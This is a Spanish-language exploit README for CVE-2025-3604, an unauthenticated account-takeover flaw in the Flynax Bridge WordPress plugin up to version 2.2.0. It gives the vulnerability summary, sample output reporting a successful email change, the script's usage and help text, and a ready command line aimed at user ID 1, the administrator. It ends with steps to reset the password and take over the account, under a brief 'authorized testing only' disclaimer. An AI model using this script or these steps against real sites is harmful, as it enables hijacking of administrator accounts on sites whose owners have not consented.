
Flynax Bridge <= 2.2.0 - Escalada de privilegios no autenticada mediante apropiación de cuenta
El plugin Flynax Bridge para WordPress es vulnerable a escalada de privilegios mediante toma de cuenta en todas las versiones hasta la 2.2.0 inclusive.
Esto se debe a que el plugin no valida correctamente la identidad de un usuario antes de actualizar los detalles de su cuenta (como el correo electrónico). Como resultado, los atacantes no autenticados pueden cambiar la dirección de correo electrónico de cualquier usuario, incluidos los administradores, y luego iniciar un restablecimiento de contraseña para tomar el control total de la cuenta.
CVE: CVE-2025-3604
CVSS: 9.8 (Crítico)
Publicado: 23 de abril de 2025
Última actualización: 24 de abril de 2025
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited
Después de una explotación exitosa, el atacante puede ir a la página de inicio de sesión de WordPress y hacer clic en "¿Perdiste tu contraseña?" usando el correo electrónico recién establecido para restablecer la contraseña y obtener acceso total a la cuenta objetivo.
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID
WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-mail, --newmail NEWMAIL
New email to set
-id, --user_id USER_ID User ID to exploit
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"
-u: URL base del sitio WordPress.-id: ID del usuario objetivo (normalmente 1 para el administrador).-mail: Nuevo correo electrónico que se establecerá para ese usuario.Úselo bajo su propio riesgo. Solo para pruebas autorizadas y fines educativos.
Por: Nxploited ( Khaled_alenazi )